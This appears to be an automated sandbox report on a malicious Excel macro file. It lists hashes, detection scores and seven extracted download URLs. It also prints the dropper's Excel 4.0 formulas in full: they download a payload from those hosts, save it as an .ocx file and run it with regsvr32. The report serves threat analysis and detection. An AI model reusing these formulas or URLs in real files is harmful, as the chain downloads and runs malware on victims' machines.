Overview

overview

10

Static

static

10

bf3f16d59b...7.xlsm

windows7-x64

10

bf3f16d59b...7.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    bf3f16d59b50dab4b140b142619e4217f3890c94ca696b72802e372f0aa7f337

  • Size

    38KB

  • Sample

    241120-rvnf3syjct

  • MD5

    9cc923502bb72a56735f1abd5322a34e

  • SHA1

    4179b3b4b9dab070c817d759f50a38f2815c1b8b

  • SHA256

    bf3f16d59b50dab4b140b142619e4217f3890c94ca696b72802e372f0aa7f337

  • SHA512

    98219543ed116317064a145e7b214b739e47f741b5d432cef2fdacaeda6024d8f23f21f71b40671aec8bae3a55e8c514afb7c8f1157be160d619c95df53149a2

  • SSDEEP

    768:SbdpCR8kjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIyYS:ywDOZZ1ZYpoQ/pMAeVIyYzaT

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://pianistprodigy.com/demolms/Ax6ZgvEJJ8HEKfXrp/

https://risamfg.com/wp-admin/JtqFQW/

https://thailand-rocco.com/wp-content/gE7UvFwLh/

https://pregy.org/test/rXTl1DEv0CWCE/

https://romusreselling.xyz/wordpress/Lgv7VKTvFFuBH8uct2Eq/

https://olawyer.net/wp-includes/e8jtEIL3lFkImOvd9k/

https://tebetdanelon.com.br/wp-content/iVrceXC3knlRRl/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pianistprodigy.com/demolms/Ax6ZgvEJJ8HEKfXrp/","..\wnru.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://risamfg.com/wp-admin/JtqFQW/","..\wnru.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://thailand-rocco.com/wp-content/gE7UvFwLh/","..\wnru.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pregy.org/test/rXTl1DEv0CWCE/","..\wnru.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://romusreselling.xyz/wordpress/Lgv7VKTvFFuBH8uct2Eq/","..\wnru.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://olawyer.net/wp-includes/e8jtEIL3lFkImOvd9k/","..\wnru.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://tebetdanelon.com.br/wp-content/iVrceXC3knlRRl/","..\wnru.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://pianistprodigy.com/demolms/Ax6ZgvEJJ8HEKfXrp/
xlm40.dropper

https://risamfg.com/wp-admin/JtqFQW/
xlm40.dropper

https://thailand-rocco.com/wp-content/gE7UvFwLh/
xlm40.dropper

https://pregy.org/test/rXTl1DEv0CWCE/
xlm40.dropper

https://romusreselling.xyz/wordpress/Lgv7VKTvFFuBH8uct2Eq/
xlm40.dropper

https://olawyer.net/wp-includes/e8jtEIL3lFkImOvd9k/
xlm40.dropper

https://tebetdanelon.com.br/wp-content/iVrceXC3knlRRl/

Targets

    • Target

      bf3f16d59b50dab4b140b142619e4217f3890c94ca696b72802e372f0aa7f337

    • Size

      38KB

    • MD5

      9cc923502bb72a56735f1abd5322a34e

    • SHA1

      4179b3b4b9dab070c817d759f50a38f2815c1b8b

    • SHA256

      bf3f16d59b50dab4b140b142619e4217f3890c94ca696b72802e372f0aa7f337

    • SHA512

      98219543ed116317064a145e7b214b739e47f741b5d432cef2fdacaeda6024d8f23f21f71b40671aec8bae3a55e8c514afb7c8f1157be160d619c95df53149a2

    • SSDEEP

      768:SbdpCR8kjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIyYS:ywDOZZ1ZYpoQ/pMAeVIyYzaT

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks